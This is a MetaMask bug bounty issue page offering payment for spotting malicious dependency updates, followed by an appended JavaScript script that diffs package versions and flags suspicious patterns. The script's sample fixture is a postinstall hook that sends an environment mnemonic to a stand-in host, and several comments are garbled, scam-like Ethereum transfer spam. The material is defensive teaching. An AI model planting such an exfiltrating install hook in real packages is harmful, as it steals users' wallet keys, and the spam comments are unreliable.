Malicious Dependency Update Bug Bounty #6699
Comments
Issue Status: 1. Open 2. Started 3. Submitted 4. Done
This issue now has a funding of 3000.0 DAI (3000.0 USD @ $1.0/DAI) attached to it.

Issue Status: 1. Open 2. Started 3. Submitted 4. Done
Work has been started. These users each claimed they can complete the work by 316 years, 10 months from now.
1) fincrypchain001 has started work.
COMPLETE SELECT ETHEREUM ADDRESS AUTOPAID ANOTHER PLACE EVERY 50 ETHEREUM 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 TO 0x7BC13FE91B6a355f85c13D8C89108d689c9E6fa7 Make a difference.
Learn more on the Gitcoin Issue Details page.

Issue Status: 1. Open 2. Started 3. Submitted 4. Done
Work has been started. These users each claimed they can complete the work by 313 years, 11 months from now.
1) fincrypchain001 has started work.
COMPLETE SELECT ETHEREUM ADDRESS AUTOPAID ANOTHER PLACE EVERY 50 ETHEREUM 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2 TO 0x7BC13FE91B6a355f85c13D8C89108d689c9E6fa7 Make a difference.
Identify the dependency with malicious code. I am planning to expand the network in a new era of generations. What are your thoughts on it?
I would like to learn and complete this task.
Well, I will take a look and I will start looking for the problem.
Find the vulnerable packages. I guess I'll be done in time; I hope I will finish this work in time.
Help, 500 dollars, ok.
To sum up the questions by making a generalization, to identify the solutions, and to overcome all the troubles in order.
I want to learn what N3 is good for and what it gains.
Learn more on the Gitcoin Issue Details page.
@danfinlay It seems you've renewed that issue on Gitcoin. If so, how can I get notified about new PRs that need to be checked?

@agutsal Like the parent post says, we're posting pending release candidates to Twitter with metamask_bot.

Thanks. I'm not a big fan of Twitter, which is why I've been looking for other ways to get notified. Will check now.

You could use IFTTT to message you on another protocol upon our tweets?

Thanks. I'll think of something better, I guess. CircleCI notifications would work better for me.

Is this still open?

Yes, this bounty is open and available for payout if anyone can identify a malicious dependency.

Oh, I can see why you'd ask: originally this was opened in response to many newly updated dependencies. That said, I think it's safe to leave open, as an encouragement for developers to scrutinize our code-base.
@danfinlay @kumavis @danjm @Gudahtt @whymarrh @Zanibas

danfinlay never replies to anything, and it's also impossible to contact the MetaMask team. There are no real bounties here; don't lose your time like I did.

@AgCaliva Thanks. I'll try. The project is actively developed, and I hope someone will reply.
Thank you for fixing my issue
On Sat, 14 May 2565 BE (2022) at 12:38 am, Arsen A. Hutsal wrote:
> @AgCaliva Thanks. I'll try. The project is actively developed, and I hope someone will reply.
This issue represents the latest bug bounty in the MetaMask bug bounty program.
We will pay out this issue and bounty to any user who is able to identify a dependency update we have merged that includes malicious code designed to illegitimately access user keys.
Since this bounty is only good for code we have merged but not yet deployed, to participate in this program it will be useful to be notified about our latest release candidates before they are published.
We have a new release candidate up with many new dependency updates (introduced in #6698), making it a prime candidate for this bounty. I recommend the use of a dependency-diffing tool such as npmfs, in particular for finding vulnerabilities potentially introduced by this change. We are keeping this release candidate up for a full week, maximizing the opportunity that this bounty can be filled!
NpmFS is a great tool for analyzing the differences between npm modules at two release versions, and could be useful in pursuing this bounty.
We have created a new Twitter account, MetaMask Bot, for posting about pending releases, which should also be useful to interested bounty hunters. A simple IFTTT Twitter notification can allow you to receive these updates via the messaging platform of your choice.
Happy Hunting!
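The post above recommends diffing two versions of a dependency and looking for newly introduced code that could reach user keys. As an added example (not MetaMask's code and not npmfs), the script below shows the shape of that review: it compares two package trees, reports added, removed and changed files, flags lifecycle scripts (`postinstall` and friends) that appear or change between versions, and runs a small set of heuristic indicators (child_process, eval, dynamic Function, outbound network calls, long hex-escaped strings, key-material identifiers) over the added and changed files, reporting only indicators that were not already present in the old version. The two package trees, the package name `example-lib`, the host `example.invalid` and the indicator list are all constructed for the example so it runs offline; in practice you would fill the maps from two extracted tarballs (`npm pack example-lib@<version>`), and a match is a starting point for manual reading, not proof of malice.

```javascript
// Added example: heuristic dependency diff for two versions of an npm package.
// Not MetaMask's code and not npmfs. Trees are maps of path -> file content,
// constructed inline here; populate them from extracted tarballs in real use.

// Indicators worth a human look when they first appear in a version bump.
// Heuristics only: presence is a reason to read the code, not a verdict.
const SUSPICIOUS_PATTERNS = [
  { name: 'child_process', re: /require\(['"]child_process['"]\)/ },
  { name: 'eval', re: /\beval\s*\(/ },
  { name: 'dynamic-function', re: /new\s+Function\s*\(/ },
  { name: 'network', re: /\b(https?\.request|fetch)\s*\(/ },
  { name: 'hex-escaped-string', re: /(\\x[0-9a-fA-F]{2}){4,}/ },
  { name: 'key-material', re: /\b(privateKey|mnemonic|seedPhrase|keyring)\b/i },
];

// npm runs these automatically on install, so a new one is always notable.
const LIFECYCLE_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];

function parseManifest(tree) {
  const raw = tree['package.json'];
  return raw ? JSON.parse(raw) : {};
}

// Returns only the lifecycle entries of a manifest's "scripts" block.
function lifecycleScripts(manifest) {
  const scripts = manifest.scripts || {};
  return Object.fromEntries(
    LIFECYCLE_SCRIPTS.filter((k) => k in scripts).map((k) => [k, scripts[k]])
  );
}

function findPatterns(text) {
  return SUSPICIOUS_PATTERNS.filter((p) => p.re.test(text)).map((p) => p.name);
}

// Diff two package trees and report what a reviewer should look at first.
function diffPackage(oldTree, newTree) {
  const oldPaths = new Set(Object.keys(oldTree));
  const newPaths = new Set(Object.keys(newTree));
  const added = [...newPaths].filter((p) => !oldPaths.has(p)).sort();
  const removed = [...oldPaths].filter((p) => !newPaths.has(p)).sort();
  const changed = [...newPaths]
    .filter((p) => oldPaths.has(p) && oldTree[p] !== newTree[p])
    .sort();

  // Lifecycle scripts that are new or whose command changed.
  const oldScripts = lifecycleScripts(parseManifest(oldTree));
  const newScripts = lifecycleScripts(parseManifest(newTree));
  const newLifecycleScripts = Object.entries(newScripts)
    .filter(([k, v]) => oldScripts[k] !== v)
    .map(([k, v]) => `${k}: ${v}`);

  // Indicators that appear in a file for the first time in the new version.
  const findings = [];
  for (const p of [...added, ...changed]) {
    const hitsBefore = new Set(findPatterns(oldTree[p] || ''));
    const newHits = findPatterns(newTree[p]).filter((h) => !hitsBefore.has(h));
    if (newHits.length) findings.push({ file: p, indicators: newHits });
  }
  return { added, removed, changed, newLifecycleScripts, findings };
}

// Constructed sample: a benign 1.0.0 and a 1.0.1 that adds a postinstall
// script posting an environment secret to a remote host.
const OLD_TREE = {
  'package.json': JSON.stringify({ name: 'example-lib', version: '1.0.0', main: 'lib/index.js' }),
  'lib/index.js': 'module.exports = function add(a, b) { return a + b; };\n',
};
const NEW_TREE = {
  'package.json': JSON.stringify({
    name: 'example-lib', version: '1.0.1', main: 'lib/index.js',
    scripts: { postinstall: 'node scripts/setup.js' },
  }),
  'lib/index.js': 'module.exports = function add(a, b) { return a + b; };\n',
  'scripts/setup.js':
    "const https = require('https');\n" +
    "const k = process.env.MNEMONIC || '';\n" +
    "https.request({ host: 'example.invalid', path: '/' + encodeURIComponent(k), method: 'POST' }).end();\n",
};

function main() {
  console.log(JSON.stringify(diffPackage(OLD_TREE, NEW_TREE), null, 2));
}
main();
```

Running the block prints that `scripts/setup.js` was added, `package.json` changed, a `postinstall` hook now runs the new file, and the new file introduces both an outbound request and a key-material identifier; that combination is exactly the kind of change the bounty asks reviewers to catch before a release candidate ships.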